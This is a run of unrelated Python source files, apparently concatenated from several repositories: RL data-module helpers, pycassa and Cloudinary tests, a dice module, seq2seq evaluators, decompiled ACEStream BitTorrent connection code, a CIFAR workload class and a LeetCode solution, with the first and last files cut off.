online_env = _build_env(env_builder, n_envs) n_samples_per_step = batch_size env_loop = EnvironmentLoop(online_env, select_online_actions, fetch_agent_info=fetch_agent_info) online_step_callback = OnlineDataCollectionCallback( buffer, env_loop, n_samples_per_step=n_samples_per_step, n_populate_steps=0, post_process_function=post_process_function, clear_buffer_before_gather=True, ) return data_module, [online_step_callback] def _build_env(env_builder: EnvBuilder, n_envs: int) -> gym.Env: if n_envs > 1: return SyncVectorEnv([env_builder for _ in range(n_envs)]) else: return env_builder() def off_policy_dataset( env_builder: EnvBuilder, select_online_actions: Policy, fetch_agent_info: Optional[FetchAgentInfo] = None, # buffer capacity: int = 100_000, # batch batch_size: int = 32, # online callback n_envs: int = 1, steps_per_epoch: int = 5000, n_populate_steps: int = 10000, # post processing post_process_function: Optional[PostProcessFunction] = None, ) -> Tuple[OnlineDataModule, List[Callback]]: buffer = UniformReplayBuffer(capacity) samples_per_epoch = steps_per_epoch * batch_size sampler = UniformSampler(buffer, samples_per_epoch) data_module = OnlineDataModule(buffer, batch_size, sampler=sampler, pin_memory=True, n_workers=0) online_env = _build_env(env_builder, n_envs) n_samples_per_step = batch_size env_loop = EnvironmentLoop(online_env, select_online_actions, fetch_agent_info=fetch_agent_info) online_step_callback = OnlineDataCollectionCallback( buffer, env_loop, n_samples_per_step=n_samples_per_step, n_populate_steps=n_populate_steps, post_process_function=post_process_function, clear_buffer_before_gather=False, ) return data_module, [online_step_callback] def eval_callback( env_builder: EnvBuilder, select_actions: Policy, seed: Optional[int] = None, n_envs: int = 1, n_eval_episodes: int = 10, n_test_episodes: int = 100, to_eval: bool = False, logging_prefix: str = "Evaluation", mean_return_in_progress_bar: bool = True, ) -> EnvironmentEvaluationCallback: env = _build_env(env_builder, n_envs) env_loop = EnvironmentLoop(env, select_actions) return EnvironmentEvaluationCallback( env_loop, n_eval_episodes=n_eval_episodes, n_test_episodes=n_test_episodes, to_eval=to_eval, seed=seed, logging_prefix=logging_prefix, mean_return_in_progress_bar=mean_return_in_progress_bar, ) 1-10 import unittest from nose.tools import assert_raises, assert_equal, assert_true from pycassa import index, ColumnFamily, ConnectionPool,\ NotFoundException, SystemManager from pycassa.contrib.stubs import ColumnFamilyStub, ConnectionPoolStub, \ SystemManagerStub pool = cf = None pool_stub = cf_stub = None def setup_module(): global pool, cf, indexed_cf, pool_stub, indexed_cf_stub, cf_stub credentials = {'username': 'jsmith', 'password': ''} pool = ConnectionPool(keyspace='PycassaTestKeyspace', credentials=credentials, timeout=1.0) cf = ColumnFamily(pool, 'Standard1', dict_class=TestDict) indexed_cf = ColumnFamily(pool, 'Indexed1') pool_stub = ConnectionPoolStub(keyspace='PycassaTestKeyspace', credentials=credentials, timeout=1.0) cf_stub = ColumnFamilyStub(pool_stub, 'Standard1', dict_class=TestDict) indexed_cf_stub = ColumnFamilyStub(pool_stub, 'Indexed1') def teardown_module(): cf.truncate() cf_stub.truncate() indexed_cf.truncate() indexed_cf_stub.truncate() pool.dispose() class TestDict(dict): pass class TestColumnFamilyStub(unittest.TestCase): def setUp(self): pass def tearDown(self): for test_cf in (cf, cf_stub): for key, columns in test_cf.get_range(): test_cf.remove(key) def test_empty(self): key = 'TestColumnFamily.test_empty' for test_cf in (cf, cf_stub): assert_raises(NotFoundException, test_cf.get, key) assert_equal(len(test_cf.multiget([key])), 0) for key, columns in test_cf.get_range(): assert_equal(len(columns), 0) def test_insert_get(self): key = 'TestColumnFamily.test_insert_get' columns = {'1': 'val1', '2': 'val2'} for test_cf in (cf, cf_stub): assert_raises(NotFoundException, test_cf.get, key) ts = test_cf.insert(key, columns) assert_true(isinstance(ts, (int, long))) assert_equal(test_cf.get(key), columns) def test_insert_multiget(self): key1 = 'TestColumnFamily.test_insert_multiget1' columns1 = {'1': 'val1', '2': 'val2'} key2 = 'test_insert_multiget1' columns2 = {'3': 'val1', '4': 'val2'} missing_key = 'key3' for test_cf in (cf, cf_stub): test_cf.insert(key1, columns1) test_cf.insert(key2, columns2) rows = test_cf.multiget([key1, key2, missing_key]) assert_equal(len(rows), 2) assert_equal(rows[key1], columns1) assert_equal(rows[key2], columns2) assert_true(missing_key not in rows) def insert_insert_get_indexed_slices(self): columns = {'birthdate': 1L} keys = set() for i in range(1, 4): indexed_cf.insert('key%d' % i, columns) indexed_cf_stub.insert('key%d' % i, columns) keys.add('key%d' % i) expr = index.create_index_expression(column_name='birthdate', value=1L) clause = index.create_index_clause([expr]) for test_indexed_cf in (indexed_cf, indexed_cf_stub): count = 0 for key, cols in test_indexed_cf.get_indexed_slices(clause): assert_equal(cols, columns) assert key in keys count += 1 assert_equal(count, 3) def test_remove(self): key = 'TestColumnFamily.test_remove' for test_cf in (cf, cf_stub): columns = {'1': 'val1', '2': 'val2'} test_cf.insert(key, columns) # An empty list for columns shouldn't delete anything test_cf.remove(key, columns=[]) assert_equal(test_cf.get(key), columns) test_cf.remove(key, columns=['2']) del columns['2'] assert_equal(test_cf.get(key), {'1': 'val1'}) test_cf.remove(key) assert_raises(NotFoundException, test_cf.get, key) Wal100/dice_game #!/usr/bin/env python3 # -*- coding: utf-8 -*- """Example on a module rolling dices.""" # pylint: disable=W0603 import random FACES = 6 ROLLS_MADE = 0 def init(): """Roll a dice once and return the value.""" global ROLLS_MADE random.seed() ROLLS_MADE = 0 def roll(): """Roll a dice once and return the value.""" global ROLLS_MADE ROLLS_MADE += 1 return random.randint(1, FACES) def get_rolls_made(): """Get number of rolls made.""" return ROLLS_MADE Neronuser/EmoCourseChat import torch import torchtext from src.models.conversational.emotion_dialogue_dataset import UTTERANCE_FIELD_NAME, RESPONSE_FIELD_NAME, \ EMOTION_FIELD_NAME from src.models.conversational.loss import NLLLoss from src.models.conversational.utils import PAD_INDEX class Evaluator(object): """Evaluate models with given datasets.""" def __init__(self, loss=NLLLoss(), batch_size=64): """Initialize the evaluator with loss and batch size. Args: loss (Optional[seq2seq.loss]): Loss to count. Defaults to seq2seq.loss.NLLLoss. batch_size (Optional[int]): Batch size. Defaults to 64. """ self.loss = loss self.batch_size = batch_size def evaluate(self, model, data): """Evaluate a model on given dataset and return performance. Args: model (seq2seq.models): Model to evaluate. data (torchtext.data.Dataset): Dataset to evaluate against. Returns: loss (float): Loss of the given model on the given dataset. """ model.eval() loss = self.loss loss.reset() match = 0 total = 0 device = None if torch.cuda.is_available() else -1 batch_iterator = torchtext.data.BucketIterator( dataset=data, batch_size=self.batch_size, sort=True, sort_key=lambda x: len(x.src), device=device, train=False) pad = PAD_INDEX for batch in batch_iterator: input_variables, input_lengths = getattr(batch, UTTERANCE_FIELD_NAME) target_variables = getattr(batch, RESPONSE_FIELD_NAME) decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(), target_variables) # Evaluation seqlist = other['sequence'] for step, step_output in enumerate(decoder_outputs): target = target_variables[:, step + 1] loss.eval_batch(step_output.view(target_variables.size(0), -1), target) non_padding = target.ne(pad) correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().data[0] match += correct total += non_padding.sum().data[0] if total == 0: accuracy = float('nan') else: accuracy = match / total return loss.get_loss(), accuracy class EmotionEvaluator(Evaluator): """Evaluate models with given datasets.""" def evaluate(self, model, data): """Evaluate a model on given dataset and return performance. Args: model (seq2seq.models): Model to evaluate. data (torchtext.data.Dataset): Dataset to evaluate against. Returns: loss (float): Loss of the given model on the given dataset. """ model.eval() loss = self.loss loss.reset() match = 0 total = 0 device = None if torch.cuda.is_available() else -1 batch_iterator = torchtext.data.BucketIterator( dataset=data, batch_size=self.batch_size, sort=True, sort_key=lambda x: len(x.src), device=device, train=False) pad = PAD_INDEX for batch in batch_iterator: input_variables, input_lengths = getattr(batch, UTTERANCE_FIELD_NAME) target_variables = getattr(batch, RESPONSE_FIELD_NAME) emotion_variables = getattr(batch, EMOTION_FIELD_NAME) decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(), target_variables, emotion_variables) # Evaluation seqlist = other['sequence'] for step, step_output in enumerate(decoder_outputs): target = target_variables[:, step + 1] loss.eval_batch(step_output.view(target_variables.size(0), -1), target) non_padding = target.ne(pad) correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().data[0] match += correct total += non_padding.sum().data[0] if total == 0: accuracy = float('nan') else: accuracy = match / total return loss.get_loss(), accuracy #Embedded file name: ACEStream\Core\BitTornado\BT1\Encrypter.pyo import sys from base64 import b64encode from cStringIO import StringIO from binascii import b2a_hex from socket import error as socketerror from urllib import quote from struct import unpack from time import time from traceback import print_stack from ACEStream.Core.BitTornado.BT1.MessageID import protocol_name, option_pattern from ACEStream.Core.BitTornado.BT1.convert import toint from ACEStream.Core.ProxyService.ProxyServiceUtil import * from ACEStream.Core.Utilities.logger import log, log_exc from ACEStream.GlobalConfig import globalConfig try: True except: True = 1 False = 0 DEBUG = False DEBUG_CLOSE = False DEBUG_SKIP_SOURCE_CONNECTION = False if sys.platform == 'win32': winvertuple = sys.getwindowsversion() spstr = winvertuple[4] if winvertuple[0] == 5 or winvertuple[0] == 6 and winvertuple[1] == 0 and spstr < 'Service Pack 2': MAX_INCOMPLETE = 8 else: MAX_INCOMPLETE = 1024 else: MAX_INCOMPLETE = 32 AUTOCLOSE_TIMEOUT = 55 def make_readable(s): if not s: return '' if quote(s).find('%') >= 0: return b2a_hex(s).upper() return '"' + s + '"' def show(s): return b2a_hex(s) class IncompleteCounter(): def __init__(self): self.c = 0 def increment(self): self.c += 1 def decrement(self): self.c -= 1 def toomany(self): return self.c >= MAX_INCOMPLETE incompletecounter = IncompleteCounter() class Connection(): def __init__(self, Encoder, connection, id, ext_handshake = False, locally_initiated = None, dns = None, coord_con = False, proxy_con = False, challenge = None, proxy_permid = None): self.Encoder = Encoder self.connection = connection self.connecter = Encoder.connecter self.id = id self.readable_id = make_readable(id) self.coord_con = coord_con self.proxy_con = proxy_con self.proxy_permid = proxy_permid self.challenge = challenge if locally_initiated is not None: self.locally_initiated = locally_initiated elif coord_con: self.locally_initiated = True elif proxy_con: self.locally_initiated = True else: self.locally_initiated = id != None self.complete = False self.keepalive = lambda : None self.closed = False self.buffer = StringIO() self.dns = dns self.support_extend_messages = False self.connecter_conn = None self.support_merklehash = False self.na_want_internal_conn_from = None self.na_address_distance = None if self.locally_initiated: incompletecounter.increment() self.create_time = time() if self.locally_initiated or ext_handshake: if DEBUG: log('Encoder.Connection::__init__: writing protname + options + infohash') self.connection.write(chr(len(protocol_name)) + protocol_name + option_pattern + self.Encoder.download_id) if ext_handshake: if DEBUG: log('Encoder.Connection::__init__: writing my peer-ID') if coord_con: if DEBUG: log('Encoder.Connection::__init__: i am a doe, using challenge', self.challenge) proxy_peer_id = encode_challenge_in_peerid(self.Encoder.my_id, self.challenge) self.connection.write(proxy_peer_id) else: self.connection.write(self.Encoder.my_id) if DEBUG: log('Encoder.Connection::__init__: next func = read_peer_id: ip', self.get_ip(), 'port', self.get_port()) self.next_len, self.next_func = 20, self.read_peer_id else: if DEBUG: log('Encoder.Connection::__init__: next func = read_header_len: ip', self.get_ip(), 'port', self.get_port()) self.next_len, self.next_func = 1, self.read_header_len self.Encoder.raw_server.add_task(self._auto_close, AUTOCLOSE_TIMEOUT) def get_ip(self, real = False): return self.connection.get_ip(real) def get_port(self, real = False): return self.connection.get_port(real) def get_myip(self, real = False): return self.connection.get_myip(real) def get_myport(self, real = False): return self.connection.get_myport(real) def get_id(self): return self.id def get_proxy_permid(self): return self.proxy_permid def get_readable_id(self): return self.readable_id def is_locally_initiated(self): return self.locally_initiated def is_flushed(self): return self.connection.is_flushed() def supports_merklehash(self): return self.support_merklehash def supports_extend_messages(self): return self.support_extend_messages def set_options(self, s): r = unpack('B', s[5]) if r[0] & 16: self.support_extend_messages = True if DEBUG: log('encoder::set_options: Peer supports EXTEND') if r[0] & 32: self.support_merklehash = True if DEBUG: log('encoder::set_options: Peer supports Merkle hashes') def read_header_len(self, s): if ord(s) != len(protocol_name): if DEBUG: log('Encoder.Connection::read_header_len: bad header len: ip', self.get_ip(), 'port', self.get_port(), 's', ord(s)) return None if DEBUG: log('Encoder.Connection::read_header_len: next func is read_header: ip', self.get_ip(), 'port', self.get_port()) return (len(protocol_name), self.read_header) def read_header(self, s): if s != protocol_name: if DEBUG: log('Encoder.Connection::read_header: bad header: ip', self.get_ip(), 'port', self.get_port(), 's', s) return None if DEBUG: log('Encoder.Connection::read_header: next func is read_reserved: ip', self.get_ip(), 'port', self.get_port()) return (8, self.read_reserved) def read_reserved(self, s): if DEBUG: log('Encoder.Connection::read_reserved: Reserved bits:', show(s)) log('Encoder.Connection::read_reserved: Reserved bits=', show(option_pattern)) self.set_options(s) if DEBUG: log('Encoder.Connection::read_reserved: next func is read_download_id: ip', self.get_ip(), 'port', self.get_port()) return (20, self.read_download_id) def read_download_id(self, s): if s != self.Encoder.download_id: return None if not self.locally_initiated: self.Encoder.connecter.external_connection_made += 1 if self.coord_con: if DEBUG: log('encoder::read_download_id: i am a proxy, using challenge', self.challenge) proxy_peer_id = encode_challenge_in_peerid(self.Encoder.my_id, self.challenge) self.connection.write(chr(len(protocol_name)) + protocol_name + option_pattern + self.Encoder.download_id + proxy_peer_id) else: self.connection.write(chr(len(protocol_name)) + protocol_name + option_pattern + self.Encoder.download_id + self.Encoder.my_id) if DEBUG: log('Encoder.Connection::read_download_id: next func is read_peer_id: ip', self.get_ip(), 'port', self.get_port()) return (20, self.read_peer_id) def read_peer_id(self, s): if DEBUG: log('Encoder.Connection::read_peer_id: ip', self.get_ip(), 'port', self.get_port()) if not self.id: self.id = s self.readable_id = make_readable(s) elif s != self.id: if DEBUG: log('Encoder.Connection::read_peer_id: s != self.id, returning None: ip', self.get_ip(), 'port', self.get_port()) return None self.complete = self.Encoder.got_id(self) if DEBUG: log('Encoder.Connection::read_peer_id: complete', self.complete, 'ip', self.get_ip(), 'port', self.get_port()) if not self.complete: if DEBUG: log('Encoder.Connection::read_peer_id: self not complete!!!, returning None: ip', self.get_ip(), 'port', self.get_port()) return None if self.locally_initiated: if self.coord_con: if DEBUG: log('Encoder.Connection::read_peer_id: i am a proxy, using challenge', self.challenge) proxy_peer_id = encode_challenge_in_peerid(self.Encoder.my_id, self.challenge) self.connection.write(proxy_peer_id) else: self.connection.write(self.Encoder.my_id) incompletecounter.decrement() self.Encoder._start_connection_from_queue(sched=False) c = self.Encoder.connecter.connection_made(self) self.keepalive = c.send_keepalive return (4, self.read_len) def read_len(self, s): l = toint(s) if l > self.Encoder.max_len: return None return (l, self.read_message) def read_message(self, s): if s != '': self.connecter.got_message(self, s) return (4, self.read_len) def read_dead(self, s): return None def _auto_close(self): if not self.complete: if DEBUG: log('Encoder.Connection:_auto_close: ', self.get_myip(), self.get_myport(), 'to', self.get_ip(), self.get_port()) repexer = self.Encoder.repexer if repexer and not self.closed: try: repexer.connection_timeout(self) except: log_exc() self.close() def close(self, closeall = False): if DEBUG: log('Encoder.Connection::close: ip', self.get_ip(), 'port', self.get_port()) if not self.closed: self.connection.close() self.sever(closeall=closeall) def sever(self, closeall = False): self.closed = True if self.Encoder.connections.has_key(self.connection): self.Encoder.admin_close(self.connection) repexer = self.Encoder.repexer if repexer and not self.complete: try: repexer.connection_closed(self) except: log_exc() if self.complete: self.connecter.connection_lost(self) elif self.locally_initiated: incompletecounter.decrement() if not closeall: self.Encoder._start_connection_from_queue(sched=False) def send_message_raw(self, message): if not self.closed: self.connection.write(message) def data_came_in(self, connection, s): self.Encoder.measurefunc(len(s)) while 1: if self.closed: return i = self.next_len - self.buffer.tell() if i > len(s): self.buffer.write(s) return self.buffer.write(s[:i]) s = s[i:] m = self.buffer.getvalue() self.buffer.reset() self.buffer.truncate() try: x = self.next_func(m) except: log_exc() self.next_len, self.next_func = 1, self.read_dead raise if x is None: if DEBUG: print >> sys.stderr, 'encoder: function failed', self.next_func self.close() return self.next_len, self.next_func = x def connection_flushed(self, connection): if self.complete: self.connecter.connection_flushed(self) def connection_lost(self, connection): if self.Encoder.connections.has_key(connection): self.sever() def is_coordinator_con(self): if self.coord_con: return True elif self.Encoder.helper is not None and self.Encoder.helper.is_coordinator_ip(self.get_ip()) and self.get_ip() != '127.0.0.1': return True else: return False def is_helper_con(self): coordinator = self.connecter.coordinator if coordinator is None: return False return coordinator.is_helper_ip(self.get_ip()) def na_set_address_distance(self): hisip = self.get_ip(real=True) myip = self.get_myip(real=True) a = hisip.split('.') b = myip.split('.') if a[0] == b[0] and a[1] == b[1] and a[2] == b[2]: if DEBUG: print >> sys.stderr, 'encoder.connection: na: Found peer on local LAN', self.get_ip() self.na_address_distance = 0 else: self.na_address_distance = 1 def na_get_address_distance(self): return self.na_address_distance class Encoder(): def __init__(self, connecter, raw_server, my_id, max_len, schedulefunc, keepalive_delay, download_id, measurefunc, config, limit_connections_queue): self.raw_server = raw_server self.connecter = connecter self.my_id = my_id self.max_len = max_len self.schedulefunc = schedulefunc self.keepalive_delay = keepalive_delay self.download_id = download_id self.measurefunc = measurefunc self.config = config self.connections = {} self.banned = {} self.to_connect = set() self.trackertime = None self.paused = False self.limit_connections_queue = limit_connections_queue if self.config['max_connections'] == 0: self.max_connections = 1073741824 else: self.max_connections = self.config['max_connections'] self.rerequest = None self.toofast_banned = {} self.helper = None self.white_list = None self.black_list = None self.app_mode = globalConfig.get_mode() if self.app_mode == 'node': self.last_source_check_time = None source_node = globalConfig.get_value('source_node') support_nodes = globalConfig.get_value('support_nodes') if not globalConfig.get_value('allow_peers_download'): self.white_list = set() if source_node is not None and globalConfig.get_value('allow_source_download'): self.white_list.add(source_node[0]) if len(support_nodes) and globalConfig.get_value('allow_support_download'): self.white_list.update([ addr[0] for addr in support_nodes ]) else: self.black_list = set() if source_node is not None and not globalConfig.get_value('allow_source_download'): self.black_list.add(source_node[0]) if len(support_nodes) and not globalConfig.get_value('allow_support_download'): self.black_list.update([ addr[0] for addr in support_nodes ]) if len(self.black_list) == 0: self.black_list = None if DEBUG: log('Encoder::__init__: white_list', self.white_list, 'black_list', self.black_list) schedulefunc(self.send_keepalives, keepalive_delay) self.repexer = None def send_keepalives(self): self.schedulefunc(self.send_keepalives, self.keepalive_delay) if self.paused: return for c in self.connections.values(): c.keepalive() def start_connections(self, dnsidlist): if self.rerequest is not None and self.rerequest.am_video_source: if DEBUG: log('encoder::start_connections: do not start connections for live source') return if DEBUG: log('encoder::start_connections: adding', len(dnsidlist), 'peers to queue, current len', len(self.to_connect)) wasempty = not self.to_connect self.to_connect.update(dnsidlist) if self.limit_connections_queue > 0: if DEBUG: log('encoder::start_connections: check queue limit: qlen', len(self.to_connect), 'limit', self.limit_connections_queue) while len(self.to_connect) > self.limit_connections_queue: self.to_connect.pop() if DEBUG: log('encoder::start_connections: queue limit done: qlen', len(self.to_connect), 'limit', self.limit_connections_queue) if wasempty: self.raw_server.add_task(self._start_connection_from_queue) self.trackertime = time() def _start_connection_from_queue(self, sched = True): try: force_sched = False if self.app_mode == 'node' and (self.last_source_check_time is None or time() - self.last_source_check_time > 10): try: self.last_source_check_time = time() if globalConfig.get_value('allow_source_download'): source_node = globalConfig.get_value('source_node') if source_node is not None: connected_to_source = False if len(self.connections) == 0: if DEBUG: log('encoder::_start_connection_from_queue: no connections, connect to the source:', source_node) else: if DEBUG: log('encoder::_start_connection_from_queue: check connection to the source:', source_node) for v in self.connections.values(): if v is None: continue ip = v.get_ip(True) port = v.get_port(False) if DEBUG: log('encoder::_start_connection_from_queue: check connection to the source: test ip', ip, 'port', port) if ip == source_node[0] and port == source_node[1]: connected_to_source = True if DEBUG: log('encoder::_start_connection_from_queue: got connection to the source:', source_node) break if not connected_to_source: if DEBUG: log('encoder::_start_connection_from_queue: start connection to the source:', source_node) force_sched = True self.to_connect.add((tuple(source_node), 0)) if globalConfig.get_value('allow_support_download'): support_nodes = globalConfig.get_value('support_nodes') if len(support_nodes): nodes = {} for addr in support_nodes: nodes[tuple(addr)] = False if len(self.connections) == 0: if DEBUG: log('encoder::_start_connection_from_queue: no connections, connect to support nodes:', support_nodes) else: for v in self.connections.values(): if v is None: continue ip = v.get_ip(True) port = v.get_port(False) if DEBUG: log('encoder::_start_connection_from_queue: check connection to support node: test ip', ip, 'port', port) addr = (ip, port) if addr in nodes: nodes[addr] = True if DEBUG: log('encoder::_start_connection_from_queue: got connection to support node:', addr) for addr, connected in nodes.iteritems(): if not connected: if DEBUG: log('encoder::_start_connection_from_queue: start connection to support node:', addr) force_sched = True self.to_connect.add((addr, 0)) except: print_exc() if not self.to_connect: return if self.connecter.external_connection_made: max_initiate = self.config['max_initiate'] else: max_initiate = int(self.config['max_initiate'] * 1.5) cons = len(self.connections) if DEBUG: log('encoder::_start_connection_from_queue: conns', cons, 'max conns', self.max_connections, 'max init', max_initiate) if cons >= self.max_connections or cons >= max_initiate: delay = 60.0 if DEBUG: log('encoder::_start_connection_from_queue: cons >= max: delay', delay) elif self.paused or incompletecounter.toomany(): delay = 1.0 if DEBUG: log('encoder::_start_connection_from_queue: paused or too many: delay', delay) else: delay = 0.0 dns, id = self.to_connect.pop() if self.white_list is not None and dns[0] not in self.white_list: if DEBUG: log('encoder::_start_connection_from_queue: peer is not in the white list: dns', dns) elif self.black_list is not None and dns[0] in self.black_list: if DEBUG: log('encoder::_start_connection_from_queue: peer is in the black list: dns', dns) else: if DEBUG: log('encoder::_start_connection_from_queue: start now: dns', dns, 'id', id) self.start_connection(dns, id) if force_sched or self.to_connect and sched: if force_sched: delay = 11.0 if DEBUG: log('encoder::_start_connection_from_queue: start_from_queue: force', force_sched, 'delay', delay) self.raw_server.add_task(self._start_connection_from_queue, delay) except: log_exc() raise def start_connection(self, dns, id, coord_con = False, proxy_con = False, forcenew = False, challenge = None, proxy_permid = None): if DEBUG: log('encoder::start_connection: start_connection:', dns) log('encoder::start_connection: start_connection: qlen', len(self.to_connect), 'nconns', len(self.connections), 'maxi', self.config['max_initiate'], 'maxc', self.config['max_connections']) if (self.paused or len(self.connections) >= self.max_connections or id == self.my_id or self.banned.has_key(dns[0])) and not forcenew: if DEBUG: print >> sys.stderr, "encoder: start_connection: we're paused or too busy" return True for v in self.connections.values(): if v is None: continue if id and v.id == id and not forcenew: if DEBUG: log('encoder::start_connection: already connected to peer', id) return True ip = v.get_ip(True) port = v.get_port(False) if DEBUG: log('encoder::start_connection: candidate', ip, port, 'want', dns[0], dns[1]) if self.config['security'] and ip != 'unknown' and ip == dns[0] and port == dns[1] and not forcenew: if DEBUG: log('encoder::start_connection: using existing', ip, 'want port', dns[1], 'existing port', port, 'id', `id`) return True try: if DEBUG: log('encoder::start_connection: Setting up new to peer', dns, 'id', `id`, 'proxy_con', proxy_con, 'challenge', challenge) c = self.raw_server.start_connection(dns) con = Connection(self, c, id, dns=dns, coord_con=coord_con, proxy_con=proxy_con, challenge=challenge, proxy_permid=proxy_permid) self.connections[c] = con c.set_handler(con) except socketerror: if DEBUG: log('encoder::start_connection: failed') return False return True def _start_connection(self, dns, id): def foo(self = self, dns = dns, id = id): self.start_connection(dns, id) self.schedulefunc(foo, 0) def got_id(self, connection): if connection.id == self.my_id: ret = self.connecter.na_got_loopback(connection) if DEBUG: print >> sys.stderr, 'encoder: got_id: connection to myself? keep', ret if ret == False: self.connecter.external_connection_made -= 1 return ret ip = connection.get_ip(True) port = connection.get_port(False) connection.na_set_address_distance() if self.config['security'] and self.banned.has_key(ip): if DEBUG: print >> sys.stderr, 'encoder: got_id: security ban on IP' return False for v in self.connections.values(): if connection is not v: if DEBUG: print >> sys.stderr, 'encoder: got_id: new internal conn from peer? ids', connection.id, v.id if connection.id == v.id: if DEBUG: print >> sys.stderr, 'encoder: got_id: new internal conn from peer? addrs', v.na_want_internal_conn_from, ip if v.na_want_internal_conn_from == ip: self.connecter.na_got_internal_connection(v, connection) return True if v.create_time < connection.create_time: if DEBUG: print >> sys.stderr, 'encoder: got_id: create time bad?!' return False if self.config['security'] and ip != 'unknown' and ip == v.get_ip(True) and port == v.get_port(False): if DEBUG: log('encoder::got_id: closing duplicate connection') v.close() return True def external_connection_made(self, connection): if DEBUG: log('encoder::external_connection_made: ip', connection.get_ip(), 'port', connection.get_port()) if self.paused or len(self.connections) >= self.max_connections: if DEBUG: log('encoder::external_connection_made: paused or too many: ip', connection.get_ip(), 'port', connection.get_port()) connection.close() return False con = Connection(self, connection, None) self.connections[connection] = con connection.set_handler(con) return True def externally_handshaked_connection_made(self, connection, options, msg_remainder): if DEBUG: log('encoder::externally_handshaked_connection_made: ip', connection.get_ip(), 'port', connection.get_port()) if self.paused or len(self.connections) >= self.max_connections: connection.close() return False con = Connection(self, connection, None, True) con.set_options(options) self.connections[connection] = con connection.set_handler(con) if msg_remainder: con.data_came_in(con, msg_remainder) return True def close_all(self): if DEBUG: print >> sys.stderr, 'encoder: closing all connections' copy = self.connections.values()[:] for c in copy: c.close(closeall=True) self.connections = {} def ban(self, ip): self.banned[ip] = 1 def pause(self, flag): self.paused = flag def set_helper(self, helper): self.helper = helper def set_rerequester(self, rerequest): self.rerequest = rerequest def how_many_connections(self): return len(self.connections) + len(self.to_connect) def admin_close(self, conn): del self.connections[conn] now = time() remaining_connections = len(self.connections) + len(self.to_connect) if DEBUG_CLOSE: log('Encoder::admin_close: ip', conn.get_ip(), 'port', conn.get_port(), 'remaining connections', remaining_connections) print_stack() if DEBUG_CLOSE and remaining_connections == 0 and self.trackertime and self.rerequest is not None: log('>>>encoder:admin_close: amount left', self.rerequest.amount_left(), 'is_video_source', self.rerequest.am_video_source) if remaining_connections == 0 and self.trackertime and self.rerequest is not None and not self.rerequest.am_video_source and self.rerequest.amount_left(): if self.rerequest.check_network_connection(announce=False): schedule_refresh_in = max(30, int(300 - (now - self.trackertime))) if DEBUG_CLOSE: log('Encoder::admin_close: want new peers in', schedule_refresh_in, 's') if schedule_refresh_in <= 0: self.rerequest.encoder_wants_new_peers() else: self.raw_server.add_task(self.rerequest.encoder_wants_new_peers, schedule_refresh_in) self.trackertime = None """ Namespace package for piro plugins. """ __import__('pkg_resources').declare_namespace(__name__) 0 """Cifar workload parent class.""" import itertools from typing import Dict, Tuple import jax from algorithmic_efficiency import spec import algorithmic_efficiency.random_utils as prng class BaseCifarWorkload(spec.Workload): def __init__(self): self._eval_iters = {} self._param_shapes = None self._param_types = None def has_reached_goal(self, eval_result: float) -> bool: return eval_result['validation/accuracy'] > self.target_value @property def target_value(self): return 0.85 @property def loss_type(self): return spec.LossType.SOFTMAX_CROSS_ENTROPY @property def num_train_examples(self): return 50000 @property def num_eval_train_examples(self): return 10000 @property def num_validation_examples(self): return 10000 @property def num_test_examples(self): return 10000 @property def train_mean(self): return [0.49139968 * 255, 0.48215827 * 255, 0.44653124 * 255] @property def train_stddev(self): return [0.24703233 * 255, 0.24348505 * 255, 0.26158768 * 255] # data augmentation settings @property def scale_ratio_range(self): return (0.08, 1.0) @property def aspect_ratio_range(self): return (0.75, 4.0 / 3.0) @property def center_crop_size(self): return 32 @property def max_allowed_runtime_sec(self): return 3600 @property def eval_period_time_sec(self): return 600 def _eval_model( self, params: spec.ParameterContainer, images: spec.Tensor, labels: spec.Tensor, model_state: spec.ModelAuxiliaryState, rng: spec.RandomState) -> Tuple[spec.Tensor, spec.ModelAuxiliaryState]: """Return the summed metrics for a given batch.""" raise NotImplementedError def _eval_metric(self, logits, labels): """Return the mean accuracy and loss as a dict.""" raise NotImplementedError def _eval_model_on_split(self, split: str, num_examples: int, global_batch_size: int, params: spec.ParameterContainer, model_state: spec.ModelAuxiliaryState, rng: spec.RandomState, data_dir: str) -> Dict[str, float]: """Run a full evaluation of the model.""" data_rng, model_rng = prng.split(rng, 2) if split not in self._eval_iters: eval_iter = self.build_input_queue( data_rng, split, data_dir, global_batch_size=global_batch_size) # Note that this stores the entire eval dataset in memory. self._eval_iters[split] = itertools.cycle(eval_iter) total_metrics = {'accuracy': 0., 'loss': 0.} num_data = 0 num_batches = num_examples // global_batch_size for bi, batch in enumerate(self._eval_iters[split]): if bi > num_batches: break per_device_model_rngs = prng.split(model_rng, jax.local_device_count()) batch_metrics = self._eval_model(params, batch, model_state, per_device_model_rngs) total_metrics = { k: v + batch_metrics[k] for k, v in total_metrics.items() } num_data += batch_metrics['num_data'] return {k: float(v / num_data) for k, v in total_metrics.items()} def build_input_queue(self, data_rng: spec.RandomState, split: str, data_dir: str, global_batch_size: int): """Build an input queue for the given split.""" ds = self._build_dataset(data_rng, split, data_dir, global_batch_size) for batch in iter(ds): batch = jax.tree_map(lambda x: x._numpy(), batch) # pylint: disable=protected-access yield batch Priyansh2/LeetCode-Solutions # Time: O(nlogn) # Space: O(n) # greedy class Solution(object): def minimalKSum(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ result = k*(k+1)//2 curr = k+1 for x in sorted(set(nums)): if x < curr: result += curr-x curr += 1 return result # Time: O(nlogn) # Space: O(n) # greedy class Solution2(object): def minimalKSum(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ result = prev = 0 nums.append(float("inf")) for x in sorted(set(nums)): if not k: break cnt = min((x-1)-prev, k) k -= cnt result += ((prev+1)+(prev+cnt))*cnt//2 prev = x return result import tempfile import time import unittest import zipfile import certifi import cloudinary import cloudinary.poster.streaminghttp from cloudinary import uploader, utils from mock import patch import six import urllib3 from urllib3 import disable_warnings from test.helper_test import SUFFIX, TEST_IMAGE, api_response_mock, cleanup_test_resources_by_tag, UNIQUE_TEST_ID, \ get_uri, get_list_param, get_params MOCK_RESPONSE = api_response_mock() TEST_TAG = "arch_pycloudinary_test_{}".format(SUFFIX) TEST_TAG_RAW = "arch_pycloudinary_test_raw_{}".format(SUFFIX) disable_warnings() class ArchiveTest(unittest.TestCase): @classmethod def setUpClass(cls): cloudinary.reset_config() uploader.upload(TEST_IMAGE, tags=[TEST_TAG]) 